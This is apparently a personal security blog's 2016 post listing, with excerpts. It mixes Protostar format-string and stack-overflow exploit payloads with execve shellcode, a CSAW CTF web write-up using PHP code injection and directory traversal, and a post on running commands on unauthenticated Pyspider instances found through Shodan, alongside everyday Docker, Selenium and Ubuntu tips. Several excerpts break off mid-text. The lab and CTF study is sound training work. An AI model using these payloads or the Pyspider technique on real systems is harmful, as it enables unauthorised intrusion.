Posts

Showing posts from 2016

Exploit Exercises - Format String

Format1:
Padding to last mem dump
run `python -c 'print "\x38\x96\x04\x08"+"AAABB"+"%x."*143'`%x
Write
run `python -c 'print "\x38\x96\x04\x08"+"AAABB"+"%x."*143'`%n
DMA
/opt/protostar/bin/format1 `python -c 'print "CC"+"\x38\x96\x04\x08"+"AAA%142$n"'`
Format2 need write value to address:
POC:
python -c 'print "\xe4\x96\x04\x08%42x"+"%x."*2+"%n"' > foo
|Address|Value|Padding|%n

DMA
python -c 'print "\xe4\x96\x04\x08"+"%60u%4$n"'  |  /opt/protostar/bin/format2

Format3: write 4 byte with speacify address: POC: python -c 'print "\xf4\x96\x04\x08"+"%x"*10+"%11x%n"+"BB"+"\xf5\x96\x04\x08"+"%x"*6+"%475x%n"+"B"+"\xf6\x96\x04\x08"+"%x"*4+"%136x%n"+"B"+"\xf7\x96\x04\x08"+"%x&qu…

Exploit Exercises - Protostar Stack 7

In this level, app check return address not start with 0xbxxxxxxx. So i pop pop ret to load return address to stack, and call it.
Found pop pop ret at: 0x08048492
This payload:
| "A" * 80 | address | 8 bytes junk | | NOP to bit shifing | Shell code |
This is shell code:
\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80
Load poc to gdb, debug, break point, etc... I found nop shell start at: 0xbffff698. Ok build poc:
(python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "\x98\xf6\xff\xbf" + "\x90"*40 +"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat) And run it:
(python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "…

Exploit Exercises - Protostar Stack 6

It is free time - I had some time to play exploit-exercises. Today i play at stack level 6. I learned some experience for me, with return to lib.
Use gdb, disassembly:
#gdb -q /opt/protostar/bin/stack6  (gdb) disas main
Dump of assembler code for function main:
0x080484fa :    push   %ebp
0x080484fb :    mov    %esp,%ebp
0x080484fd :    and    $0xfffffff0,%esp
0x08048500 :    call   0x8048484
0x08048505 :   mov    %ebp,%esp
0x08048507 :   pop    %ebp
0x08048508 :   ret  
End of assembler dump.  (gdb) disas getpath
Dump of assembler code for function getpath:
0x08048484 : push   %ebp
0x08048485 : mov    %esp,%ebp
0x08048487 : sub    $0x68,%esp
0x0804848a : mov    $0x80485d0,%eax
0x0804848f :        mov    %eax,(%esp)
0x08048492 :        call   0x80483c0
0x08048497 :        mov    0x8049720,%eax
0x0804849c :        mov    %eax,(%esp)
0x0804849f :        call   0x80483b0
0x080484a4 :        lea    -0x4c(%ebp),%eax
0x080484a7 :        mov    %eax,(%esp)
0x080484aa :        call   0x8048380
0x080484af :…

Some experience when use Docker

In this week, my job is set up ELK with Suricata. I choose docker is platform to run all. Now, i had some experience about docker.
Use docker-compose. It is very good deployment for production, build && run.
Install docker-compose via pip.
Use build image to create your custom start-up distro.
I used docker compose version 2 syntax, notice different with version, like network and net
Use network --net if you need monitor, or use all card
You can not use cd command, must use WORKDIR. Read Dockerfile document very carefully.
Use links, when use it, it run links container before. You can run manual, and start main container after. Must sure it started.
In docker command, must use command to hold tty, like: suricata -c xxx or python manager server 0.0.0.0:8080
----------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be conti…

Tampermonkey HelloWorld and create menuCommand

Image
Today, i need write one script with tampermonkey. It is very hard :(.
To write helloworld. Create new script.
Edit config: Add
// @connect      *
// @match        http://*/*
// @match        https://*/*
You can edit author, homepage, etc..
Add your code in main code in comment. I used console.log()
 This is result:
I need create button in menu, so i used:
Edit config, remove grant none and add: // @grant        GM_registerMenuCommand

You will see new menu button in tamper monkey.
----------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued - I will update more.

[Writeup] CSAW CTF 2016

Image
mfw (125)
This main url:
http://web.chal.csaw.io:8000

Fuzz it to easy:
http://web.chal.csaw.io:8000/?page=about%27.phpinfo%28%29.%27

Play with flag
http://web.chal.csaw.io:8000/?page=about%27.system%28%22cat%20templates/flag.php%22%29.%27
flag{3vald_@ss3rt_1s_best_a$$ert}


wtf.sh 1 (150)

http://web.chal.csaw.io:8001
Register one account, logined.
Create post, view post
Fuzzing now, i found directory traversal (WTF? traversal again)
When fuzz to: http://web.chal.csaw.io:8001/post.wtf?post=zabOA/../../ I found some source code. I guess may be can read all file in this directoty, like cat * :)).

I found some interesting function (after use decoder to view beautifull code):

function hash_password {
    local password=$1;
    (shasum <<< ${password}) | cut -d\  -f1;
}
# hash usernames for lookup in the users_lookup table
function hash_username {
    local username=$1;
    (shasum <<< ${username}) | cut -d\  -f1;
}
# generate a random token, base64 encoded
# on GNU base64 wraps at 76 …

RCE in Pyspider

Image
Today i read one articles about exploit debug mode in Werkzeug. It old, but very interesting. When i try to find website in shodan, i found 30s website use pyspider. Pyspider is python opensource, you can download and install it from: https://github.com/binux/pyspider
It had one problem, it not authentication. Anyone can access.

When click to one process, you can go to debug mode. And you can edit python code. So, you can use it to run code execute. It is RCE.


This is my POC:
       import subprocess
        p = subprocess.Popen(["id","-m"], stdout=subprocess.PIPE)
        output, err = p.communicate()
        print(output)
---------------------------------------------------------- Thanks for reading -------------------------------------------------------------------------- Security Research SecurityLab - Linux Lab -- Window and Cisco Lab to be continued - I will update more.

Install Skype and Facebook Message Plugin for Ubuntu

In windows, easy to install Facebook App, Skype App. But on Ubuntu, i need one app for 2 services. So i choose pidgin.
1. Install Facebook plugin:
We use purple-facebook:
sudo sh -c "echo 'deb http://download.opensuse.org/repositories/home:/jgeboski/xUbuntu_$(lsb_release -rs)/ /' >> /etc/apt/sources.list.d/jgeboski.list"
cd /tmp && wget  http://download.opensuse.org/repositories/home:/jgeboski/xUbuntu_$(lsb_release -rs)/Release.key
sudo apt-key add - < Release.key
sudo apt-get update
sudo apt-get install purple-facebook Add your facebook account in Manager Account.
2. Install Skype plugin:
We use skypeweb:
sudo apt-get install libpurple-dev libjson-glib-dev cmake gcc
git clone git://github.com/EionRobb/skype4pidgin.git
cd skype4pidgin/skypeweb
mkdir build
cd build
cmake ..
cpack
sudo dpkg -i skypeweb-1.1.0-Linux.deb
Add your skype account in Manager Account.

---------------------------------------------------------- Thanks for reading -------------------------…

Use marco to Anti-CSRF token in Burpsuite

Image
When i am reading one paper about Burpsuite trick, this talk about: Burpsuite marco, and we can use it to anti-csrf token.
I tried it with this demo: http://www.businessinfo.co.uk/labs/csrf_defend/form_token_demo_stage2.php
First request to get token in htlm (formtoken), and post request (request 2) use it to check.
Now, we need use marco to automatic get token, add to post data.
Make sure 2 request and response in http proxy, and intercept is off
Go to project options (version > 1.7) or options (<=1.6, i not sure). I used pro version. Chose Session tab. In session handing rules, add new rule:
Type your rule name, like Anti CSRF Rule for xx.com. In rule action, choose Add, with "run post-request marco" type. You can see Action handing editor.
Add new marcos by click add, new marco editor and marco recorder windows open
Now, in marco recorder you must choose 2 request. request 1 is request get token, and request 2 is action request use token (choose by select it). 
Clic…

Automount partition in Ubuntu with fstab

Before use Ubuntu, i installed windows OS. I had 2 partitions in nfts, its not auto mount, only mount when i click in local disk icon.
So i need auto load it, to run many application in this partitions.
First, i need find ssid of partition in: /dev/disk/by-uuid.
Then, edit /etc/fstab. Add:
 UUID=327E4E257E4DE1E9/mnt/sdb1/ntfs  rw,auto,users,exec,nls=utf8,umask=003,gid=46,uid=100000
UUID=38D822D9D82294E2   /mnt/sdb2/      ntfs    rw,auto,users,exec,nls=utf8,umask=003,gid=46,uid=1000   0       0

Whit UUID i founded, and uid is id of my user. To add this location to menu bar, use "Bookmark this location" of Gnome.
---------------------------------------------------------- Thanks for reading -------------------------------------------------------------------------- Security Research SecurityLab - Linux Lab -- Window and Cisco Lab to be continued - I will update more.

Some experience while working with ElasticSearch, Angular

In this week, i join one project need program web portal. My hobby is Python so i chose Flask, Angular JS. I`m using bootstrap to make css template.
My DB is ElasticSearch. I don`t use http request to make query ES, i used python-es lib.
So, when use ES, i have some problems.
1. Sort in ES:
            data = self.es.search(index=self.indexName, doc_type=self.docType,
                                  body={"query": {
                                      "filtered": {
                                          "query": {
                                              "bool": {
                                                  "must": mustDict,
                                              },
                                          }
                                      }
                                  },
                                      "size": size, "from": from_, "sort": {"timestamp":…

Popup interactive in Selenimum

When develop AWATT tool, i got this problem: after click, pop up alert windows show and must confirm (accept, dismiss) to continue.
You can not use selector of selenium to control it. This is  solution:

from selenium import webdriver
import time
url = "http://www.javascripter.net/faq/alert.htm"
driver = webdriver.Firefox()
driver.get(url)
element = driver.find_element_by_xpath("//input[@type='button']")
element.click()
alert = driver.switch_to_alert()
time.sleep(2)
alert.accept()
# alert.dismiss()
----------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued - I will update more.

File Upload with Selenium

Yesterday, my brother asked me: "How to automatic upload a file with Selenium". Today, i had free time to solve it.
Try this code. I used python blinding:
from selenium import webdriver
url = "https://encodable.com/uploaddemo/"
driver = webdriver.Firefox()
driver.get(url)
element = driver.find_element_by_id("uploadname1")
element.send_keys("/home/habachnam/a.txt") ----------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued - I will update more.

Install Metasploit Ubuntu quick way

Install Metasploit in Ubuntu:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall

Now, u can use apt-get update to update metasploit

----------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued - I will update more.

Get a Unity-like appmenu (global menu) in Ubuntu Gnome Session Fallback

When i use Ubuntu, first thing is install gnome-session-fallback. Because i like classic app menu.
But if u use Hopper Disassembler, i only run in unity (to display app menu). I found way to display app menu in gnome-session-fallback:
sudo apt-get install indicator-applet-appmenu After install it, move mouse to top panel, use Windows (Supper) key + Alt + Right Click, chose Add to panel/ select indicator-applet-appmenu, chose Add. Now, you can use Unity app-menu
----------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued - I will update more.